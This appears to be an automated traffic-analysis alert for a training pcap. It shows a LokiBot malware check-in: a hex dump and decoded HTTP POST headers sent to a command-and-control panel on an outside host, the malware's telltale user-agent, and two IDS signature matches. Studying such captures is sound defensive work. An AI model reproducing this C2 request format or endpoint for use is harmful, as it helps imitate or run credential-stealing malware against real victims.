
LokiBot Checkin detected in 2017-11-21-traffic-analysis-exercise-2-of-6.pcap

Time: 2017/11/21 00:13:59 +0000
Packet: 15193
Protocol: HTTP / tcp
Source: 10.192.1.157:49288
Destination: 185.118.166.155:80

Payload (272 bytes)

00000000  50 4f 53 54 20 2f 77 70 2d 61 64 6d 69 6e 2f 63  POST /wp-admin/c
00000010  73 73 2f 63 6f 6c 6f 72 73 2f 62 6c 75 65 2f 50  ss/colors/blue/P
00000020  61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68  anel/five/fre.ph
00000030  70 20 48 54 54 50 2f 31 2e 30 0d 0a 55 73 65 72  p HTTP/1.0..User
00000040  2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f  -Agent: Mozilla/
00000050  34 2e 30 38 20 28 43 68 61 72 6f 6e 3b 20 49 6e  4.08 (Charon; In
00000060  66 65 72 6e 6f 29 0d 0a 48 6f 73 74 3a 20 74 63  ferno)..Host: tc
00000070  6f 6f 6c 6f 6e 6c 69 6e 65 2e 6d 6f 62 69 0d 0a  oolonline.mobi..
00000080  41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 43 6f 6e  Accept: */*..Con
00000090  74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69  tent-Type: appli
000000A0  63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72  cation/octet-str
000000B0  65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 45 6e 63  eam..Content-Enc
000000C0  6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 43  oding: binary..C
000000D0  6f 6e 74 65 6e 74 2d 4b 65 79 3a 20 45 41 30 35  ontent-Key: EA05
000000E0  35 37 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65  5764..Content-Le
000000F0  6e 67 74 68 3a 20 32 30 34 0d 0a 43 6f 6e 6e 65  ngth: 204..Conne
00000100  63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a  ction: close....

Decoded HTTP request (CRLF line endings):

POST /wp-admin/css/colors/blue/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: tcoolonline.mobi
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: EA055764
Content-Length: 204
Connection: close

The 272-byte payload shown above is the request headers only (it ends with the empty CRLF line); the 204-byte body declared by Content-Length is not included in this excerpt.

2 Alerts

Alerts provided by Emerging Threats 2022-04-08

Signature | Category | SID.rev | Rule Set
1 | LokiBot Checkin | Malware Command and Control Activity Detected | 2025381.5 | ET MALWARE
1 | LokiBot User-Agent (Charon/Inferno) | A Network Trojan was detected | 2021641.7 | ET MALWARE

External References

There are no references available for these alerts.

Community ID

Community ID is an open standard for hashing network flows into identifiers and can be used to correlate connections across different tools.

Zeek: conn.log: 1:AuNn9vwZBdd/aoP9f7+UlmtGdUY=